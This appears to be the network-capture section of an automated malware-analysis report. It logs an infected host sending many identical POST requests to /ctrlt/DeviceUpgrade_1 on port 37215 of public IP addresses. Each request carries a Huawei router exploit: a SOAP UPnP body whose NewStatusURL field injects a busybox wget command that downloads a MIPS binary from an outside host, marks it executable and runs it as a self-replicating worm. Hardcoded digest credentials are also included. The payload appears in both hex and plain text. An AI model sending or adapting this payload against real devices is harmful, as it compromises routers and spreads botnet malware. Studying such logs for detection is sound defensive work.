                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1664192.168.2.1543420157.9.35.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.930025101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1665192.168.2.1549772157.248.26.21537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.930103064 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1666192.168.2.1534348197.169.227.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.939753056 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1667192.168.2.1558000143.207.243.17937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943103075 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1668192.168.2.1548134197.3.152.23237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943129063 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1669192.168.2.1555646157.158.140.4337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943156958 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1670192.168.2.154664641.255.155.5337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943228960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1671192.168.2.1558334192.240.174.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943264008 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1672192.168.2.1547224157.55.215.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943299055 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1673192.168.2.1537512197.39.155.22937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:10.943331003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 